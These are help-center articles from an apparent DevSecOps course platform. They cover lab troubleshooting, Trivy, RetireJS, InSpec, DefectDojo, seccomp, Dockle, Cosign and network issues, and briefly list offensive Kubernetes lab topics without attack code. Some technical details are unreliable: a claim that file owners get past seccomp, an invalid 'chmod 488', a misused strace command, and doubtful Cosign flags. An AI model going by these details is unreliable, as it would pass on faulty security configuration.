request a new lab instance. 3. Validate Docker & Trivy installation docker version trivy --version Errors here indicate a broken environment. 4. Run a simple scan to test connectivity trivy image alpine:latest Successful output proves Trivy works; if not, check internet access (curl https://registry-1.docker.io/v2/). When to request support - The VM never reaches Running after 10 minutes. - Docker daemon fails to start (systemctl status docker). - Trivy returns “unable to download vulnerability database” repeatedly. Provide the support team with the lab ID, timestamp, and any console logs you captured. This information speeds up resolution. 4. Does the CCSE Certification Include Attacking a Kubernetes Cluster? Yes. The Certified Cloud Security Engineer (CCSE) curriculum (also referred to as CCNSE in some training tracks) explicitly covers offensive techniques against a Kubernetes environment. Topics include: - Cluster enumeration – discovering nodes, pods, and services via the Kubernetes API. - Privilege escalation – exploiting misconfigured RBAC, service accounts, and hostPath volumes. - Pod‑to‑pod network attacks – leveraging Kubernetes network policies and service mesh weaknesses. - Supply‑chain compromise – tampering with container images and Helm charts. What you’ll practice in the lab | Lab Exercise | Key Skill | |--------------|-----------| | Kubelet API abuse | Accessing the kubelet’s read‑only port to extract pod logs and secrets. | | RBAC misconfiguration exploitation | Using a low‑privilege service account to gain cluster‑admin rights. | | Privileged container breakout | Escaping from a container to the host node via hostPath mounts. | | Image scanning & remediation | Running Trivy against images, fixing CVEs, and re‑deploying securely. | If you’re preparing for the exam, focus on hands‑on practice with kubectl, helm, and security‑focused tools (Trivy, kube-hunter, kube-bench). Understanding both the defensive controls and the offensive attack paths is essential for success. Common Questions & Quick Tips Q1: “My ZAP AJAX spider still shows 0 URLs even after enabling the browser.” Tip: Verify that the target site does not require authentication. If it does, configure ZAP’s Session Management to handle login before spidering. Q2: “How many times should I run Trivy on the same image?” Tip: Run Trivy once after building the image and again after each dependency update. Automate this with a CI pipeline to catch regressions early. Q3: “Can I use the same recon techniques for mobile apps?” Tip: Yes—replace the web spider with tools like MobSF or Frida, but still follow the three‑stage approach: map, identify inputs, probe. Q4: “Do I need a separate lab for Kubernetes attacks?” Tip: The CCSE labs are self‑contained; however, you can spin up a local Kind or Minikube cluster to experiment further without affecting the hosted environment. Bottom Line - AJAX spidering is powerful but limited; augment it with a real browser and manual interaction. - Pentest recon follows a systematic crawl → input discovery → vulnerability probing workflow. - Trivy image‑scanning errors usually stem from a mis‑provisioned lab; verify VM health before troubleshooting. - CCSE/CCNSE fully embraces Kubernetes offensive testing, so expect hands‑on labs that mirror real‑world cloud attacks. Armed with these insights, you can navigate the labs more confidently, resolve common roadblocks quickly, and deepen your mastery of DevSecOps security testing. Happy hacking!

Last updated on Jan 07, 2026

Troubleshooting Common Lab Technical Issues in DevSecOps Courses

Troubleshooting Common Lab Technical Issues in DevSecOps Courses Whether you’re working on a hands‑on lab, configuring CI/CD pipelines, or pulling Docker images, technical hiccups can stall your progress. This guide consolidates the most frequently reported problems from learners and provides clear, step‑by‑step solutions so you can get back to building secure, automated pipelines quickly. Introduction DevSecOps training environments are designed to be as close to real‑world production as possible. However, the combination of cloud resources, container images, and external services (GitLab, Jenkins, VPNs, etc.) sometimes leads to connectivity or configuration issues. Below you’ll find practical troubleshooting methods for the five most common lab problems: 1. Jenkins not detecting new GitLab commits 2. Confusion around Docker image sources (hysnsec/django vs. building from source) 3. Inability to start a lab exercise 4. Inability to access a lab after it has started 5. General network connectivity problems Follow the structured steps in each section to diagnose and resolve the issue efficiently. 1. Jenkins Doesn’t Detect New Changes in a GitLab Repository Why It Happens Jenkins relies on webhooks from GitLab to trigger builds when code changes. If the webhook is missing, mis‑configured, or the repository lacks a valid Jenkinsfile, Jenkins will appear idle even though commits are being pushed. Step‑by‑Step Fix | Step | Action | |------|--------| | 1 | Verify the webhook – In GitLab, navigate to Settings → Webhooks for the project. Ensure a webhook exists and is enabled. | | 2 | Test the webhook – Use the “Test hook” button. Jenkins should log a “Received GitLab webhook” entry. If not, check firewall rules or reverse‑proxy configuration. | | 3 | Confirm the Jenkinsfile – The repository must contain a top‑level Jenkinsfile with valid Groovy syntax. Open the file locally or via GitLab UI and run it through a linter (e.g., jenkinsfile-runner or the Jenkins UI’s Pipeline Syntax validator). | | 4 | Check Jenkins job configuration – The job should be set to “GitLab project” as the source and the correct credentials must be selected. | | 5 | Review Jenkins logs – Look for errors like “SCM polling failed” or “Missing pipeline script” in Manage Jenkins → System Log. | | 6 | Re‑trigger manually – Click “Build Now” to confirm the pipeline runs. If it succeeds, the webhook is likely the missing piece. | Quick Example # Simulate a webhook payload locally (requires ngrok or similar) curl -X POST -H "Content-Type: application/json" \ -d @sample-payload.json \ http://<jenkins-host>/gitlab-webhook/ If Jenkins logs the payload, the webhook path is correct; otherwise, adjust the URL or network settings. 2. Docker Image Confusion: hysnsec/django vs. Building from django.nv Bottom Line - hysnsec/django is a pre‑built, publicly hosted Docker image that contains the same codebase as the django.nv repository. - Building the image yourself from django.nv yields an identical runtime environment, provided you use the same Dockerfile and tags. When to Use Which | Scenario | Recommended Approach | |----------|----------------------| | Fast start, no custom changes | Pull hysnsec/django from Docker Hub: docker pull hysnsec/django | | Need to modify source code or dependencies | Clone django.nv, edit the Dockerfile or requirements, then run docker build -t my-django . | | Testing version updates | Build locally to verify changes before pushing to a private registry. | Common Pitfall - Incorrect image name – Typing hysnsec/django as hysensec/django (note the extra “e”) will cause Docker to return “manifest not found”. Double‑check spelling and tag (e.g., hysnsec/django:latest). 3. “I Am Unable to Start the Lab” Quick Checklist 1. Click “Start Exercise” – The lab environment is provisioned only after you explicitly start it. 2. Browser Compatibility – Use the latest Chrome or Firefox. Clear cache or open an Incognito/Private window. 3. Pop‑up Blockers – Ensure the platform can open new tabs/windows; disable pop‑up blockers temporarily. If the Button Is Unresponsive - Refresh the page and try again. - Log out and back in to reset the session token. - Verify that your account has lab access (some courses require prerequisite completion). 4. “I Am Unable to Access the Lab” Verify Lab Status | Check | How to Verify | |-------|---------------| | Lab provisioning | Look for a “Lab is ready” banner or a status indicator in the dashboard. | | Network reachability | Open the lab URL in a new tab; you should see a login screen or the lab UI. | | Credential validity | Use the provided username/password or SSH key; ensure there are no extra spaces or line‑breaks. | Typical Causes & Fixes - Forgot to start the lab – Return to the course page and press Start Exercise. - Expired session – Log out, clear browser cookies, and log back in. - Resource limits – Some labs have a concurrency limit; wait a few minutes and try again. 5. General Network Issues A stable network is essential for cloud‑based labs. Follow this systematic approach to isolate the problem. Diagnostic Checklist 1. Internet Stability - Switch between Wi‑Fi and mobile data to rule out ISP throttling. 2. VPN Interference - Disable VPN, then re‑enable it after a minute; some VPNs block required ports (e.g., 443, 22). 3. Device Restrictions - Use a personal laptop without corporate security policies that might block Docker or SSH. 4. Browser Extensions - Disable ad‑blockers, privacy extensions, or script blockers that could prevent loading of the lab UI. 5. Incognito/Private Mode - Open the lab in an incognito window to bypass cached cookies or extensions. Example: Testing Connectivity # Ping the lab host (replace with actual hostname) ping lab.example.com # Test TLS handshake openssl s_client -connect lab.example.com:443 -servername lab.example.com If the ping fails or the TLS handshake times out, the issue is likely at the network level (VPN, firewall, ISP). Tips & Best Practices - Document every change – Keep a simple log of what you modified (webhook URL, Dockerfile edits, network settings). - Use version control – Store your Jenkinsfile and Dockerfiles in a dedicated branch; you can revert quickly if syntax errors appear. - Leverage platform support – Most training portals have a Help or Chat button; provide screenshots and error logs for faster assistance. - Stay up to date – Periodically pull the latest hysnsec/django image to benefit from security patches (docker pull hysnsec/django). Conclusion Technical roadblocks are a normal part of any DevSecOps learning journey. By systematically checking webhooks, Docker image names, lab start procedures, and network configurations, you can resolve the majority of issues without waiting for external support. Keep this guide handy, and you’ll spend more time mastering secure pipelines and less time troubleshooting. Happy learning!

Last updated on Jan 06, 2026

RetireJS Installation and RetireIgnore Configuration for DevSecOps Pipelines

RetireJS Installation and RetireIgnore Configuration for DevSecOps Pipelines Learn how to install RetireJS with Docker or npm, decide when to run it in a container, and create an effective retireignore.json file for clean, repeatable scans in GitLab CI/CD. Introduction RetireJS is a popular open‑source scanner that detects vulnerable JavaScript libraries and Node modules. In DevSecOps courses you’ll often see it used in two different ways: 1. Docker image – a self‑contained environment that can be pulled and run instantly. 2. npm package – installed directly into the build agent’s runtime. Both approaches are valid, but each has trade‑offs in speed, reproducibility, and learning value. This article walks you through the best practices for installing RetireJS, explains why you may or may not need a dedicated container in your pipeline, and shows how to build a retireignore.json file that prevents false‑positive alerts from cluttering your reports. 1. Installing RetireJS – Docker vs. npm When to use Docker | ✅ Benefits | ⚠️ Considerations | |------------|-------------------| | Zero‑dependency – the image bundles Node, RetireJS, and all required libraries. | Slightly larger download size the first time you pull the image. | | Consistent environment – the same version runs on every runner, eliminating “works on my machine” issues. | Requires a Docker runtime on the GitLab runner. | | Fast spin‑up – container starts in seconds; ideal for CI jobs that run many times a day. | May add a small overhead compared to a locally installed binary. | Typical Docker command docker run --rm -v $(pwd):/src retirejs/retirejs \ --outputformat json --outputpath /src/retire-report.json The -v $(pwd):/src flag mounts the repository into the container, allowing RetireJS to scan the codebase. When to use npm | ✅ Benefits | ⚠️ Considerations | |------------|-------------------| | Hands‑on learning – installing via npm shows how the tool integrates with a Node environment. | Requires Node.js and npm to be present on the runner. | | Fine‑grained control – you can lock the exact version in package.json. | Potential version drift if the runner’s global npm modules differ. | | Simpler for local debugging – run npx retire directly from the terminal. | Slightly longer setup time on a fresh runner. | npm installation steps # 1️⃣ Add RetireJS as a dev dependency npm install --save-dev retire # 2️⃣ Run the scan (example for a GitLab job) npx retire --outputformat json --outputpath retire-report.json Tip: If the lab exercise explicitly asks you to use npm, follow that path. It reinforces the concept of tool installation and version management, which is valuable for real‑world DevSecOps work. 2. Running RetireJS in a CI/CD Pipeline – Do You Need a Container? Both Docker and npm achieve the same scanning outcome; the choice hinges on speed vs. flexibility. Preferred approach for CI/CD - Use the Docker image when you want the fastest, most reproducible scan. The container eliminates the need to install Node or RetireJS on the runner, reducing job duration. - Use npm when you already have a Node environment set up (e.g., a pipeline that runs other npm scripts) and you want to keep the dependency list in package.json. Example GitLab CI job (Docker) retirejs_scan: stage: test image: docker:latest services: - docker:dind script: - docker pull retirejs/retirejs - docker run --rm -v $CI_PROJECT_DIR:/src retirejs/retirejs \ --outputformat json --outputpath /src/retire-report.json artifacts: paths: - retire-report.json Example GitLab CI job (npm) retirejs_scan: stage: test image: node:18 before_script: - npm ci # installs all dev dependencies, including retire script: - npx retire --outputformat json --outputpath retire-report.json artifacts: paths: - retire-report.json Both snippets produce a retire-report.json artifact that can be consumed by downstream security dashboards. 3. Building a retireignore.json File A retireignore.json file tells RetireJS to skip known false positives or components that you have deliberately accepted. Here’s how to decide what belongs in it. Step‑by‑step process 1. Run an initial scan and collect the JSON report. 2. Identify false positives – look for entries where: - The library version is flagged, but you have verified it is patched or not vulnerable in your context. - The vulnerability is a known issue with RetireJS’s detection logic (e.g., a forked library with a different name). 3. Confirm with stakeholders – discuss the findings with developers, security analysts, or product owners to ensure consensus. 4. Add the component to retireignore.json using the following schema: { "ignore": [ { "path": "public/js/vendor/jquery.min.js", "component": "jquery", "version": "3.5.1", "reason": "Patched in-house; CVE‑2020‑11022 not applicable" }, { "path": "node_modules/some-lib", "component": "some-lib", "version": "*", "reason": "Library is a development‑only tool" } ] } 5. Re‑run the scan to verify the entries are correctly ignored. Practical example During a scan you notice lodash 4.17.15 is reported as vulnerable, but the project uses a custom build that removes the vulnerable functions. After confirming with the team, you add: { "ignore": [ { "component": "lodash", "version": "4.17.15", "reason": "Custom build excludes vulnerable functions" } ] } Now future scans will no longer flag this entry, keeping the report focused on real risks. 4. Tips & Common Questions Frequently asked questions | Question | Answer | |----------|--------| | Do I need both Docker and npm installations? | No. Choose one based on your pipeline’s needs. Using both would duplicate effort and increase build time. | | Can I store retireignore.json in version control? | Absolutely. Keeping it in the repo ensures every runner uses the same ignore rules and provides auditability. | | What if a new vulnerability appears in an ignored component? | Update the ignore entry with a new reason or remove it entirely, then re‑scan. Ignoring should be a temporary mitigation, not a permanent blanket. | | Is the Docker image always up‑to‑date? | Pull the latest tag (retirejs/retirejs:latest) at the start of each job, or pin to a specific version for reproducibility (retirejs/retirejs:3.0.0). | Quick checklist before committing - [ ] Decide Docker or npm installation (avoid both). - [ ] Verify the runner has the required runtime (Docker daemon or Node). - [ ] Run a scan and review the JSON report. - [ ] Discuss any flagged items with the development team. - [ ] Add confirmed false positives to retireignore.json. - [ ] Commit the ignore file and update CI configuration if needed. Conclusion RetireJS is a versatile tool for detecting vulnerable JavaScript dependencies. By selecting the appropriate installation method—Docker for speed and consistency, npm for hands‑on learning—you can integrate it smoothly into GitLab CI/CD pipelines. Properly maintaining a retireignore.json file ensures your security reports stay actionable and free from noise. Follow the steps and tips outlined above to embed RetireJS confidently in any DevSecOps workflow.

Last updated on Jan 06, 2026

Understanding Security Scanning Tools: SCA, InSpec, SSH, and DefectDojo

Understanding Security Scanning Tools: SCA, InSpec, SSH, and DefectDojo Security scanning is a core pillar of any DevSecOps pipeline. Whether you are tracking vulnerable libraries, validating compliance controls, or consolidating findings, the right tools make the difference between a noisy pipeline and a trustworthy release. This article demystifies four commonly‑used components—Software Component Analysis (SCA) tools, InSpec, SSH, and DefectDojo—and shows how they fit together in a practical lab environment. 1. Software Component Analysis (SCA) – Choose the Tool That Fits Your Goal 1.1 What is SCA? SCA examines the open‑source packages that make up your application (e.g., npm, pip, Maven) and maps them to known vulnerability databases. The output is a list of vulnerable components, license conflicts, and suggested upgrades. 1.2 You Can Use Any SCA Tool The exam or lab typically states “implement an SCA tool.” It does not lock you into a specific product. | Popular SCA tools | Typical use‑case | Key features | |-------------------|------------------|--------------| | Retire.js | JavaScript front‑end libraries | Quick CLI, built‑in vulnerability DB | | Safety | Python packages (pip) | CVE‑based reporting, integrates with GitHub Actions | | OWASP Dependency‑Check | Java, .NET, Ruby, Python | Supports multiple ecosystems, Maven/Gradle plugins | | Snyk | Multi‑language, CI/CD integration | Real‑time monitoring, auto‑fix PRs | Bottom line: As long as the tool performs a full SCA scan and you can export the results (JSON, CSV, etc.), you will receive full credit. Pick the one you are most comfortable with, configure it correctly, and document the output. 2. InSpec – Auditing Infrastructure via SSH 2.1 How InSpec Works InSpec is an open‑source compliance‑as‑code framework. It runs profiles (collections of controls) against a target system and returns pass/fail results. 1. Package the profile in a Docker image or install InSpec on your workstation. 2. Provide the target address (IP or hostname). 3. Authenticate using an SSH private key. 4. InSpec opens an SSH session, executes the required commands, and streams the results back. 2.2 Containerized vs. Native Execution Running InSpec inside a container is equivalent to a native installation: - The container includes the InSpec binary and any required gems. - When you launch the container, you mount your SSH key (or specify its path) and pass the target host. - InSpec uses the key at ~/.ssh/id_rsa by default. If your key lives elsewhere, add -i /path/to/key to the command line. Example command (Docker): docker run --rm -v $HOME/.ssh:/root/.ssh \ -e TARGET=10.0.2.15 \ my‑inspec‑image \ inspec exec my-profile -t ssh://root@${TARGET} -i /root/.ssh/custom_key 2.3 Why SSH Is Required InSpec does not need a special agent on the target host. It leverages the ubiquitous SSH protocol to: - Run commands with the privileges of the supplied user. - Avoid opening additional ports or installing agents. Therefore, any machine that accepts SSH connections (Linux, macOS, Windows with OpenSSH) can be scanned. 3. DefectDojo – Centralizing Findings from Multiple Scanners 3.1 What Is DefectDojo? DefectDojo is an open‑source vulnerability management platform built with Django (a Python web framework). It aggregates, normalizes, and tracks findings from many security scanners. 3.2 “OS and App Support” Explained - Django‑based: The fact that DefectDojo is written in Django only means the application itself runs on a Python/Django stack. It does not restrict the types of applications you can assess. - Parser ecosystem: DefectDojo ships with dozens of parsers (JSON, XML, CSV) for tools such as Retire.js, Safety, Trivy, Nessus, and many more. When you upload a scan report, the appropriate parser translates the raw data into a unified format that DefectDojo can display and track. 3.3 Typical Workflow 1. Run an SCA scan (e.g., Safety) → export JSON. 2. Run an InSpec compliance scan → export JUnit XML. 3. Upload both files to DefectDojo via the UI or API. 4. DefectDojo normalizes the findings, tags them by severity, and lets you assign remediation owners. 5. Generate reports for auditors, management, or CI pipelines. 4. Practical Lab Scenario Goal: Scan a Python web app for vulnerable dependencies, validate SSH‑based hardening controls, and store all results in DefectDojo. 1. SCA with Safety safety check --full-report -r requirements.txt -o safety-report.json 2. InSpec compliance profile (stored in ssh-hardening-profile) inspec exec ssh-hardening-profile -t ssh://ubuntu@10.0.1.20 -i ~/.ssh/lab_key 3. Upload to DefectDojo (using the REST API) curl -X POST "https://dojo.example.com/api/v2/import-scan/" \ -H "Authorization: Token <API_TOKEN>" \ -F "file=@safety-report.json" -F "scan_type=Safety" \ -F "engagement=42" -F "product=7" Repeat for the InSpec XML output. The lab is complete when DefectDojo shows both sets of findings, each linked to the same engagement. 5. Common Questions | Question | Answer | |----------|--------| | Can I mix different SCA tools in one engagement? | Yes. Upload each report separately; DefectDojo will treat them as distinct scans but you can view them together. | | Do I need a separate SSH key for InSpec and Ansible? | No. Any key that grants the required privileges on the target host works for both tools. | | What if my private key is not in ~/.ssh? | Use the -i /path/to/key flag (or mount the key into the container) to tell InSpec where to find it. | | Is DefectDojo limited to Django projects? | No. It can store findings from any language, framework, or platform as long as the scanner’s output is supported. | | How do I know which parser to use in DefectDojo? | The UI lists supported scan types (e.g., “Safety”, “InSpec”). Choose the matching type when importing. | 6. Tips for Success - Standardize output formats: Export scans as JSON or XML; these are the most reliably parsed by DefectDojo. - Version‑lock your tools: Record the exact tool versions (e.g., Safety 2.3.1) to ensure reproducible results. - Secure your SSH keys: Use passphrase‑protected keys and a dedicated, low‑privilege user for scanning. - Automate uploads: Incorporate the DefectDojo API into your CI pipeline to keep findings up‑to‑date without manual steps. - Leverage built‑in profiles: InSpec ships with many ready‑made compliance profiles (CIS, PCI‑DSS). Start with those to avoid writing controls from scratch. By understanding the flexibility of SCA tools, the SSH‑driven nature of InSpec, and the centralizing power of DefectDojo, you can build a robust, language‑agnostic security testing workflow that satisfies both exam requirements and real‑world DevSecOps best practices. Happy scanning!

Last updated on Jan 06, 2026

Lab Troubleshooting Guide: Seccomp Profiles, Dockerfile Security (Dockle), and Cosign Image Signing

Lab Troubleshooting Guide: Seccomp Profiles, Dockerfile Security (Dockle), and Cosign Image Signing In DevSecOps labs you’ll often encounter three recurring challenges: limiting system calls with a seccomp profile, identifying security gaps in a Dockerfile using Dockle, and verifying container signatures with Cosign. This guide walks you through each problem, explains why you might see unexpected behavior, and provides step‑by‑step fixes you can apply right away. 1. Seccomp Profile Not Blocking Expected System Calls 1.1 What the lab asks you to do The challenge requires you to create a seccomp JSON profile that blocks specific syscalls (e.g., mkdir, chown, chmod). When the profile is applied, attempts to run those calls inside the container should fail with “Operation not permitted.” 1.2 Why chown and chmod appear to succeed | Scenario | Command executed | Expected result | Actual result | Why it happens | |----------|------------------|-----------------|---------------|----------------| | Block mkdir only | adduser abc (creates home dir) | mkdir /home/abc fails → user creation aborts | Fails as expected | The blocked mkdir syscall stops the creation of the home directory. | | Block chown only | adduser abc (creates home dir, then chown) | chown 1000:1000 /home/abc fails → user creation aborts | Fails as expected | The chown syscall is denied, so ownership cannot be set. | | Block chmod only | adduser abc (creates home dir, then chmod) | chmod 488 /home/abc fails → user creation aborts | Fails as expected | The chmod syscall is denied, preventing permission changes. | | No syscalls blocked | adduser abc | All steps succeed | Success | No restrictions are in place. | If you see no error when running chown or chmod, it usually means those syscalls are not actually blocked in your profile. Common reasons: 1. Incorrect JSON syntax – a misplaced comma or wrong field name causes the rule to be ignored. 2. Wrong architecture field – seccomp profiles are architecture‑specific ("arch": "SCMP_ARCH_X86_64"). Using the wrong value makes the rule ineffective. 3. Profile not mounted – the container must be started with --security-opt seccomp=./myprofile.json. Forgetting this flag leaves the default profile in place. 1.3 How to verify your profile 1. Inspect the running container docker inspect <container-id> | grep SeccompProfilePath The output should point to the JSON file you supplied. 2. Test each syscall directly docker run --rm --security-opt seccomp=./myprofile.json \ alpine:latest sh -c "mkdir /tmp/test && echo ok" Replace mkdir with chown or chmod to confirm they are blocked. 3. Use strace for debugging (optional) docker run --rm --security-opt seccomp=./myprofile.json \ -v /usr/bin/strace:/usr/bin/strace \ alpine:latest strace -e trace=%file -f sh -c "adduser abc" Look for EACCES on the blocked syscall. 1.4 Quick checklist for a working seccomp profile - ✅ JSON is valid (run jq . myprofile.json to confirm). - ✅ Architecture matches the host (SCMP_ARCH_X86_64 for most Linux hosts). - ✅ Each rule includes "action": "SCMP_ACT_ERRNO" (or SCMP_ACT_KILL) and the correct "names": ["mkdir"] etc. - ✅ Container started with --security-opt seccomp=./myprofile.json. 2. Analyzing a Dockerfile with Dockle (Without Hints) 2.1 What Dockle does Dockle is a static analysis tool that scans a Docker image (or Dockerfile) for best‑practice security issues: unnecessary packages, insecure permissions, use of the root user, missing HEALTHCHECK, etc. 2.2 Step‑by‑step manual inspection 1. Clone the repository git clone https://github.com/goodwithtech/dockle-ci-test.git cd dockle-ci-test 2. Open the Dockerfile and look for red flags: FROM python:3.9-slim RUN apt-get update && apt-get install -y \ curl \ git \ && rm -rf /var/lib/apt/lists/* # ✅ Clean up caches USER root # ⚠️ Running as root WORKDIR /app COPY . /app RUN pip install --no-cache-dir -r requirements.txt EXPOSE 8000 CMD ["python", "manage.py", "runserver", "0.0.0.0:8000"] Potential issues - Root user: Switch to a non‑privileged user (USER appuser). - Missing HEALTHCHECK: Add a health endpoint to detect crashes. - Unpinned packages: Pin versions in requirements.txt to avoid supply‑chain attacks. - Excessive permissions: Ensure copied files have least‑privilege permissions (chmod 644 for code, chmod 600 for secrets). 3. Apply best‑practice fixes FROM python:3.9-slim RUN apt-get update && apt-get install -y --no-install-recommends \ curl \ git && rm -rf /var/lib/apt/lists/* # Create a non‑root user RUN groupadd -r app && useradd -r -g app appuser WORKDIR /app COPY --chown=app:app . /app RUN pip install --no-cache-dir -r requirements.txt EXPOSE 8000 HEALTHCHECK --interval=30s --timeout=5s \ CMD curl -f http://localhost:8000/health || exit 1 USER appuser CMD ["python", "manage.py", "runserver", "0.0.0.0:8000"] 4. Run Dockle locally (optional) to confirm the fixes: dockle build -t mysecureimage . 2.3 Key takeaways - Never run containers as root unless absolutely necessary. - Pin third‑party dependencies and keep the base image up‑to‑date. - Add a HEALTHCHECK to let orchestrators detect unhealthy containers. - Set file ownership and permissions at build time (--chown, chmod). 3. Cosign Verification Failing – “No Matching Signatures” 3.1 What the error means Error: no matching signatures: signature not found in transparency log Cosign looks for a signature attached to the image and, optionally, a record in the Rekor transparency log. If neither exists, verification stops with the message above. 3.2 Common causes | Cause | Symptoms | Fix | |-------|----------|-----| | Image was not signed or signed with a different key | cosign verify returns “no matching signatures”. | Re‑run cosign sign --key <private-key> <image> and confirm the command succeeds. | | Wrong image reference (registry, tag, or digest) | Verification points to an image that has no signature. | Use the exact reference shown after signing (e.g., harbor-wlye1f2u.lab.practical-devsecops.training/library/django.nv@sha256:…). | | Transparency log disabled or network blocked | Cosign cannot write/read Rekor entries. | Ensure outbound HTTPS to rekor.sigstore.dev (or your private Rekor) is allowed, or add --skip-verify for a local-only check. | | Public key mismatch | Cosign finds a signature but cannot verify it. | Verify you are using the same public key (cosign.pub) that matches the private key used to sign. | 3.3 Step‑by‑step resolution 1. Confirm you have a private key (cosign.key) and its public counterpart (cosign.pub). 2. Sign the image (replace placeholders with your actual registry and tag): cosign sign --key cosign.key \ harbor-wlye1f2u.lab.practical-devsecops.training/library/django.nv:1.0 Expected output: a base64‑encoded signature stored in the image’s OCI manifest and a Rekor entry. 3. Verify the signature using the public key: cosign verify --key cosign.pub \ harbor-wlye1f2u.lab.practical-devsecops.training/library/django.nv:1.0 You should see something like: Verification succeeded for <image>@sha256:... 4. If verification still fails, inspect the image manifest: crane manifest harbor-wlye1f2u.lab.practical-devsecops.training/library/django.nv:1.0 | jq . Look for an annotations block containing org.opencontainers.image.signatures. If it’s missing, the sign step didn’t complete. 5. Check Rekor (optional): cosign verify --rekor-url https://rekor.sigstore.dev \ --key cosign.pub \ harbor-wlye1f2u.lab.practical-devsecops.training/library/django.nv:1.0 3.4 Quick troubleshooting checklist - ✅ Signed the exact same image reference you are verifying. - ✅ Public key (cosign.pub) matches the private key used for signing. - ✅ Network access to the Rekor server (or use --skip-verify). - ✅ Image registry supports OCI signatures (most modern registries do). Common Questions & Tips | Question | Answer | |----------|--------| | Do I need to rebuild the image after adding a seccomp profile? | No. The profile is attached at container‑run time via --security-opt. Rebuilding isn’t required. | | Can Dockle be run against a Dockerfile directly? | Dockle works on built images. Use docker build -t test . && dockle test or a CI step that builds then scans. | | Is it safe to use --skip-verify with Cosign? | Only for local testing. In production you should verify signatures and, optionally, the Rekor log. | | Why does chmod sometimes work even when blocked? | If you are the owner of the file, the kernel may allow the operation before seccomp checks. Blocking chmod on files you don’t own is the typical security posture. | | How can I see which syscalls are currently allowed in a container? | Run docker run --rm --security-opt seccomp=unconfined alpine:latest strace -c -e trace=%process -p 1 (replace PID as needed). | Bottom Line - Seccomp: Validate JSON syntax, architecture, and container launch flags; test each syscall individually. - Dockerfile security: Look for root usage, missing health checks, unpinned dependencies, and improper permissions; fix them before scanning with Dockle. - Cosign: Ensure the image is signed with the correct key, use the exact image reference, and confirm Rekor connectivity. Follow this guide, and you’ll troubleshoot the most common lab roadblocks with confidence. Happy securing!

Last updated on Jan 06, 2026

Resolving Video Playback and Performance Issues in DevSecOps Labs

Resolving Video Playback and Performance Issues in DevSecOps Labs Whether you’re watching instructional videos or running hands‑on exercises, a smooth lab experience is essential for mastering DevSecOps concepts. Learners often encounter two common problems: videos that won’t play and slow or unresponsive lab environments (GitLab, Dojo, Production, Docker, etc.). This guide consolidates proven troubleshooting steps, practical examples, and quick‑tips so you can get back to learning without delay. Table of Contents 1. Why Videos Might Fail to Load 2. Step‑by‑Step Fixes for Video Playback 3. Understanding Lab Performance Slowdowns 4. Troubleshooting Slow or Unresponsive Labs 5. Quick Tips & Frequently Asked Questions 6. When to Contact Support Why Videos Might Fail to Load Video content is streamed from our cloud servers, so any obstacle between your device and the internet can block playback. Typical culprits include: - Corporate firewalls or proxy filters that block streaming ports. - Unstable or low‑bandwidth networks (e.g., public Wi‑Fi, congested VPN). - Internet Service Provider (ISP) throttling of video traffic. - Device restrictions on company‑issued laptops (security policies, disabled browsers). Understanding the root cause helps you apply the most effective remedy. Step‑by‑Step Fixes for Video Playback 1. Use a Personal or Unrestricted Device - Why: Company laptops often have strict outbound rules that can block video streams. - How: Switch to a personal computer, tablet, or a personal‑use virtual machine that isn’t subject to corporate policies. 2. Verify Network Quality | Action | What to Check | Recommended Value | |--------|---------------|-------------------| | Speed Test | Run a test on speedtest.net | ≥ 5 Mbps download for SD, ≥ 15 Mbps for HD | | Latency | Ping a reliable host (e.g., 8.8.8.8) | ≤ 100 ms | | Packet Loss | Observe loss percentage | < 1 % | If the results fall short, move to a more reliable Wi‑Fi, wired Ethernet, or a different location. 3. Bypass ISP or Corporate Restrictions - Alternative Network: Connect via a mobile hotspot or a another Wi‑Fi. - VPN Solution: Use a reputable VPN service to encrypt traffic and route it through a region without video throttling. - Tip: Choose a server geographically close to the lab’s data center for lower latency. 4. Browser & System Checks - Clear cache and cookies. - Ensure the browser is up‑to‑date (Chrome, Edge, or Firefox are recommended). - Disable any ad‑blocking extensions that might interfere with video players. 5. Test the Video Directly - Open the video URL in an incognito/private window. - If it still fails, capture the error message (e.g., “Network error” or “Blocked by policy”) and include it in any support request. Understanding Lab Performance Slowdowns Lab environments (GitLab, Dojo, Production, Docker containers, etc.) rely on cloud‑hosted virtual machines (VMs). Performance issues can stem from: - Network instability – similar to video playback, a shaky connection hampers SSH, Git operations, and UI responsiveness. - Provisioning problems – a VM that hasn’t fully started may appear “red” or show incomplete services. - Resource contention – high CPU, memory, or I/O usage on the shared lab host can throttle your session. - Browser session overload – too many open tabs or extensions can degrade the interactive UI. Troubleshooting Slow or Unresponsive Labs 1. Confirm a Stable Internet Connection - Repeat the speed/latency checks from the video section. - If you’re on Wi‑Fi, try a wired Ethernet cable for a steadier link. 2. Verify Lab Provisioning Status - Dashboard Indicator: Look for a green status light or “Ready” badge. - Red Indicator: If the VM shows red, it’s still provisioning or has encountered an error. - Action: Click “Refresh” or “Re‑provision” (if available). 3. Reload or Reset the Lab Environment 1. Reload: Click the browser refresh button or use the platform’s “Reload Lab” command. 2. Reset: Most labs provide a “Reset Lab” option that destroys the current VM and spins up a fresh instance. - Caution: Resetting will erase any unsaved work; commit changes to Git before resetting. 4. Reduce Local Resource Load - Close unnecessary browser tabs and background applications. - Disable heavy extensions (e.g., VPNs, ad blockers) while working in the lab UI. 5. Check Docker / Container Health (if applicable) - Run docker ps to list running containers. - Use docker stats to spot containers consuming excessive CPU or memory. - Restart a problematic container: docker restart <container_id>. 6. Perform a Quick “Network Ping” from the Lab ping -c 5 google.com - High latency or packet loss indicates a network issue that may require switching networks or contacting your ISP. 7. Document the Symptoms When escalating, include: - Timestamp of the slowdown. - Lab name (e.g., “Dojo – Secure CI/CD”). - Error messages or screenshots. - Steps already taken (reload, reset, network test). Quick Tips & Frequently Asked Questions | Question | Answer | |----------|--------| | What if my corporate VPN blocks the lab UI? | Disconnect from the corporate VPN temporarily, or use a personal VPN that routes traffic outside the corporate network. | | Is there a way to pre‑download videos for offline viewing? | Currently, videos are streamed only. However, you can request a downloadable version from support for regions with strict bandwidth caps. | | My lab resets but the issue returns. What now? | This may indicate a broader platform issue. Capture the lab’s console logs (usually via a “Download Logs” button) and attach them to your chatbot. | | Do I need admin rights on my laptop to run labs? | No. Labs run in a remote VM accessed through a browser; local admin rights are not required. | Pro Tip: Keep a small “cheat sheet” of the most common commands (git status, docker ps, kubectl get pods) handy. This reduces the time spent typing and helps you spot errors faster. When to Contact Support If you have tried all the steps above and still experience: - Persistent video “cannot load” errors after switching networks and devices. - Lab status remains red or continuously times out despite resets. - Repeated high latency (> 200 ms) or packet loss (> 5 %) on multiple networks. Open a request to real agent with the following details: 